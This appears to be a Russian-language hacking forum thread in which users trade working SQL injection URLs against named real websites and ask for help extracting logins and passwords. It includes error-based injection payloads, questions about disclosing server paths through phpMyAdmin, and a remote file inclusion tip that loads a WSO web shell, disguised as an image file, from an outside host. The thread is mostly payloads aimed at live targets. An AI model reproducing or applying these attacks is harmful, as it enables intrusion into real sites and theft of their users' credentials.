http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+fro m+information_schema.tables+group+by+concat(table_ name,floor(rand(0)*2)))--

Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'

все понел?

Тоже самое выложил )))

да, спасибо большое !

как пути на сервере раскрыть ? есть доступ к phpmyadmin
phpmyadmin/phpinfo.php ничего не выводит...
кстати сервер под виндой

кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а

phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
/phpmyadmin/scripts/setup.php не доступен, этот файл удалён

Не могу вытащить логины да пароли из слепой скули

http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23

на 6 поле этом вылетает пустая страница.
Знаю что вывод из скули такой:

http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+

Версия:

http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) %20)a)%23&type=cabinet&action=lost_pw&mode=return_ from_hidden

Помогите вытащить пароли...нужно срочно....есть хочу=)))

Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ есть ли возможность обойти фильтрацию ?

/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp